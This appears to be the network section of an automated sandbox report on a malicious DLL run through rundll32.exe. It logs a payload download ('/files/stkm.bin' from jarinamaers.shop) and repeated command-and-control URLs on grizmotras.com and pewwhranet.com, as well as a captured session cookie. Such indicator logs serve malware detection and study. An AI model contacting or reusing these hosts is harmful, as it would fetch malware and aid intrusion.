                      Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
                      Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                          Range: bytes=0-2147483646
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                      Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                          Host: slscr.update.microsoft.com
                      Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                          Host: slscr.update.microsoft.com
                      Source: global traffic HTTP traffic detected: GET /files/stkm.bin HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                          Host: jarinamaers.shop
                      Source: global traffic DNS traffic detected: DNS query: www.google.com
                      Source: global traffic DNS traffic detected: DNS query: jarinamaers.shop
                      Source: global traffic DNS traffic detected: DNS query: grizmotras.com
                      Source: global traffic DNS traffic detected: DNS query: pewwhranet.com
                      Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drString found in binary or memory: ftp://ftp%2desktop.ini
                      Source: rundll32.exe String found in binary or memory: http://dr.f.360.cn/scan
                      Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drString found in binary or memory: http://dr.f.360.cn/scanlist
                      Source: rundll32.exe String found in binary or memory: http://pconf.f.360.cn/safe_update.php
                      Source: rundll32.exe String found in binary or memory: http://pscan.f.360.cn/safe_update.php
                      Source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drString found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
                      Source: rundll32.exe String found in binary or memory: http://sconf.f.360.cn/client_security_conf
                      Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
                      Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096149688.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096519497.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/
                      Source: rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/c
                      Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3704000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3502753170.000001E3B5740000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949671397.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/1-0
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/3
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/6
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/My
                      Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/d
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/e
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/o
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/ras.com/live/
                      Source: rundll32.exe, 00000008.00000003.5096519497.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/p
                      Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/x
                      Source: rundll32.exe, 00000008.00000003.3365882413.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3331001933.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/
                      Source: rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/$
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/V%
                      Source: rundll32.exe, 00000008.00000003.3365882413.000001E3B3703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/files/stkm.bin
                      Source: rundll32.exe, 00000008.00000003.3365701357.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365798220.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365882413.000001E3B3703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/files/stkm.binZ&XRr
                      Source: rundll32.exe, 00000008.00000003.3330399474.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3331001933.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/ive/dOIDInfo
                      Source: rundll32.exe, 00000008.00000003.3264129627.000001E3B3709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/
                      Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/
                      Source: rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/l
                      Source: rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3502753170.000001E3B5740000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949671397.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/live/
                      Source: rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/live/)
                      Source: rundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/live/ll
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
